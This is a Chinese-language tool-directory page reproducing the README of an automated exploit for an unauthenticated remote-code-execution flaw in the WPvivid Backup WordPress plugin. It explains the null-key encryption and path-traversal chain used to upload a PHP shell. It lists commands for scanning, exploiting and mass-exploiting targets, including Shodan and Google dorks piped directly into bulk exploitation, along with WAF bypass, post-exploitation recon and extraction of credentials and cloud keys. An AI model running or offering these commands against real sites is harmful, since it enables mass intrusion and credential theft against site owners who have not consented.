Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1357-POC — CVE-2026-1357 的自动化利用工具,该漏洞是 WPvivid Backup & Migration 中一个未认证的远程代码执行(RCE)漏洞。可扫描 WordPress 目标,绕过 WAF/403,通过路径遍历上传 shell,并执行利用后侦察及生成报告。 | Kitploit
工具/GitHubGitHub/cybertechajju/cve-2026-1357-poc
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用数据泄露后渗透利用WAF绕过渗透测试
GitHubcybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

CVE-2026-1357 的自动化利用工具,该漏洞是 WPvivid Backup & Migration 中一个未认证的远程代码执行(RCE)漏洞。可扫描 WordPress 目标,绕过 WAF/403,通过路径遍历上传 shell,并执行利用后侦察及生成报告。

查看仓库
816个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1357 — WPvivid Backup & Migration RCE

CVE 致谢: Lucas Montes (NiRoX)
工具作者: CyberTechAjju
CVSS: 9.8(严重) | 受影响版本: ≤ 0.9.123 | 已修复版本: 0.9.124


⚠️ 免责声明

仅用于授权安全测试。未经授权访问系统属于违法行为。


概述

通过两个链式漏洞在 WPvivid Backup & Migration 中实现未认证 RCE:

  1. 加密失败开放(Crypto Fail-Open) — openssl_private_decrypt() 在密钥错误时返回 false → phpseclib v1 将其视为空字节 AES 密钥 → 攻击者使用 16 个空字节进行加密
  2. 路径遍历(Path Traversal) — 未经过滤的 name 字段 → ../uploads/shell.php 逃逸备份目录

限制条件: 仅在 wpvivid_api_token 已生成且未过期时可利用。


功能特性


安装

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

使用方法

root@kitploit:~
# 仅扫描(检测 WordPress + WPvivid + 版本)
python3 cve_2026_1357.py -u http://target.com

# 扫描 + 利用 + 自动利用后操作
python3 cve_2026_1357.py -u http://target.com --exploit

# 利用但不进行利用后侦察
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# 批量扫描并生成报告
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# 通过 Burp 代理
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# 仅载荷模式
python3 cve_2026_1357.py -u http://x --payload-only

全部选项

root@kitploit:~
-u, --url         单个目标 URL
-l, --list        包含 URL 的文件(每行一个)
--exploit         启用利用模式
--shell NAME      Shell 文件名(默认:pwn_remote.php)
--no-post         跳过利用后侦察
--report          生成 Markdown PoC 报告
--report-dir DIR  报告输出目录
-t, --threads N   并发线程数(默认:5)
--timeout SECS    请求超时时间(默认:10)
--proxy URL       用于 Burp 的 HTTP 代理
--payload-only    打印 base64 载荷并退出
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

目标发现(Dorks)

完整列表请参阅 dorks.md。快速示例:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# 管道命令
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

文件结构

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← 主工具(扫描器 + 利用器 + 利用后操作)
├── dorks.md            ← Shodan/Google/Censys/FOFA/ZoomEye dorks
├── requirements.txt    ← Python 依赖
├── .gitignore
└── README.md           ← 本文件

致谢

Lucas Montes (NiRoX) — CVE 发现者
CyberTechAjju — 利用工具开发

下载工具
功能描述
🔍 自动检测WordPress + WPvivid 插件 + 版本指纹识别
🛡️ WAF 绕过User-Agent 轮换、请求头伪造、编码技巧
🔓 403 绕过X-Forwarded-For、X-Original-URL、路径规范化、双重编码
💀 自动利用空密钥 AES 载荷 + 路径遍历上传
📋 利用后操作自动运行 20+ 条侦察命令(id、whoami、passwd、wp-config、SUID 等)
🔑 数据提取器从输出中提取数据库凭据、API 密钥、密码、AWS 密钥
📊 报告生成包含完整利用证据的 Markdown PoC 报告
⚡ 批量扫描多线程,支持代理/Burp